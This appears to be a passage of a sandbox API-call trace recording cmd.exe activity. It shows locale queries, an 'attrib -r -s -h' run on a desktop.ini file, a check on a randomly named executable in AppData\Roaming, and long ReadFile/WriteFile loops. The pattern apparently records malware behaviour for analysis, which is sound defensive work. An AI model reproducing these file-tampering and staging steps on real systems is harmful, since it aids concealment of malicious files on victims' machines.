[0236.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0236.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0236.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0236.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0236.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0236.105] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0236.105] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0236.105] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0236.106] GetConsoleTitleW (in: lpConsoleTitle=0x490ac8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.108] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0236.108] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0236.108] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0236.108] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0236.108] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0236.108] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0236.108] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0236.109] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0236.109] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0236.109] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0236.109] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0236.110] _wcsicmp (_String1="del", _String2=")") returned 59 
[0236.110] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0236.110] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0236.110] _wcsicmp (_String1="IF", _String2="del") returned 5 [0236.110] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0236.110] _wcsicmp (_String1="REM", _String2="del") returned 14 [0236.111] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0236.112] _wcsicmp (_String1="type", _String2=")") returned 75 [0236.112] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0236.112] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0236.112] _wcsicmp (_String1="IF", _String2="type") returned -11 [0236.112] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0236.112] _wcsicmp (_String1="REM", _String2="type") returned -2 [0236.112] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0236.131] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0236.131] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0236.135] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0236.136] FindClose (in: hFindFile=0x4a2530 | out: hFindFile=0x4a2530) returned 1 [0236.136] FindClose (in: hFindFile=0x4a2530 | out: hFindFile=0x4a2530) returned 1 [0236.136] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0236.137] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0236.137] GetConsoleTitleW (in: lpConsoleTitle=0x2cf040, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.137] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ceec8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cef90 | out: lpAttributeList=0x2ceec8, lpSize=0x2cef90) returned 1 [0236.137] 
UpdateProcThreadAttribute (in: lpAttributeList=0x2ceec8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cef88, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ceec8, lpPreviousValue=0x0) returned 1 [0236.137] GetStartupInfoW (in: lpStartupInfo=0x2cee84 | out: lpStartupInfo=0x2cee84*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0236.137] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0236.138] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2cef24*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cef70 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" ", lpProcessInformation=0x2cef70*(hProcess=0x50, hThread=0x4c, dwProcessId=0xa38, dwThreadId=0xa3c)) returned 1 [0236.140] CloseHandle (hObject=0x4c) returned 1 [0236.140] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0236.140] GetEnvironmentStringsW () returned 0x4a09d0* [0236.140] FreeEnvironmentStringsW (penv=0x4a09d0) returned 1 [0236.140] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 
[0236.201] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2cee64 | out: lpExitCode=0x2cee64*=0x0) returned 1 [0236.201] CloseHandle (hObject=0x50) returned 1 [0236.201] _vsnwprintf (in: _Buffer=0x2cefac, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cee70 | out: _Buffer="00000000") returned 8 [0236.201] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0236.201] GetEnvironmentStringsW () returned 0x4a2580* [0236.201] FreeEnvironmentStringsW (penv=0x4a2580) returned 1 [0236.202] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0236.202] GetEnvironmentStringsW () returned 0x4a2580* [0236.202] FreeEnvironmentStringsW (penv=0x4a2580) returned 1 [0236.202] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ceec8 | out: lpAttributeList=0x2ceec8) [0236.202] GetConsoleTitleW (in: lpConsoleTitle=0x2cf248, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.202] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\myshap~1\\desktop.ini")) returned 0x80 [0236.202] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1" (normalized: "c:\\users\\eebsym5\\docume~1\\myshap~1")) returned 0x14 [0236.202] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0236.203] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0236.203] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\myshap~1\\desktop.ini")) returned 0x80 [0236.203] FindNextFileW (in: hFindFile=0x4a13e8, lpFindFileData=0x4a360c | out: lpFindFileData=0x4a360c) returned 0 [0236.203] GetLastError () returned 0x12 [0236.203] FindClose (in: hFindFile=0x4a13e8 | out: hFindFile=0x4a13e8) returned 1 [0236.205] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: 
"c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0236.205] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.206] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.206] GetFileType (hFile=0x50) returned 0x1 [0236.206] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.206] GetFileType (hFile=0x50) returned 0x1 [0236.206] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.206] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.207] GetFileType (hFile=0x50) returned 0x1 [0236.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.207] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.208] GetFileType (hFile=0x50) returned 0x1 [0236.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.208] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.208] GetFileType (hFile=0x50) returned 0x1 [0236.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.208] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.208] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0236.208] GetFileType (hFile=0x50) returned 0x1 [0236.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.208] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.208] GetFileType (hFile=0x50) returned 0x1 [0236.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.208] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.208] GetFileType (hFile=0x50) returned 0x1 [0236.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.208] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.208] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.208] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.208] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.208] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.209] GetFileType (hFile=0x50) returned 0x1 [0236.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.209] GetFileType (hFile=0x50) returned 0x1 [0236.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.209] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.209] GetFileType (hFile=0x50) returned 0x1 [0236.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.209] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.209] GetFileType (hFile=0x50) returned 0x1 [0236.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.209] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.209] GetFileType (hFile=0x50) returned 0x1 [0236.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.209] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.209] GetFileType (hFile=0x50) returned 0x1 [0236.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.209] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.209] GetFileType (hFile=0x50) returned 0x1 [0236.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.209] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.210] GetFileType (hFile=0x50) returned 0x1 [0236.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.210] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.210] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.210] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.210] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.210] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.210] GetFileType (hFile=0x50) returned 0x1 [0236.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.210] GetFileType (hFile=0x50) returned 0x1 [0236.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.210] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.210] GetFileType (hFile=0x50) returned 0x1 [0236.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.210] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.210] GetFileType 
(hFile=0x50) returned 0x1 [0236.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.210] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.210] GetFileType (hFile=0x50) returned 0x1 [0236.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.211] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.211] GetFileType (hFile=0x50) returned 0x1 [0236.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.211] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.211] GetFileType (hFile=0x50) returned 0x1 [0236.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.211] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.211] GetFileType (hFile=0x50) returned 0x1 [0236.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.211] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.211] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.211] SetFilePointerEx (in: hFile=0x58, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.211] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.211] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.211] GetFileType (hFile=0x50) returned 0x1 [0236.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.211] GetFileType (hFile=0x50) returned 0x1 [0236.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.211] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.211] GetFileType (hFile=0x50) returned 0x1 [0236.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.212] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.212] GetFileType (hFile=0x50) returned 0x1 [0236.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.212] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.212] GetFileType (hFile=0x50) returned 0x1 [0236.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.212] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, 
lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.212] GetFileType (hFile=0x50) returned 0x1 [0236.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.212] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.212] GetFileType (hFile=0x50) returned 0x1 [0236.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.212] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.212] GetFileType (hFile=0x50) returned 0x1 [0236.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.212] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.212] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.212] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.212] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.212] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.212] GetFileType (hFile=0x50) returned 0x1 [0236.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.213] GetFileType (hFile=0x50) returned 0x1 [0236.213] _get_osfhandle (_FileHandle=1) returned 0x50 
[0236.213] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.213] GetFileType (hFile=0x50) returned 0x1 [0236.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.213] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.213] GetFileType (hFile=0x50) returned 0x1 [0236.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.213] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.213] GetFileType (hFile=0x50) returned 0x1 [0236.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.213] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.213] GetFileType (hFile=0x50) returned 0x1 [0236.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.213] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.213] GetFileType (hFile=0x50) returned 0x1 [0236.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.213] WriteFile (in: hFile=0x50, 
lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.213] GetFileType (hFile=0x50) returned 0x1 [0236.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.214] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.214] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.214] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.214] _get_osfhandle 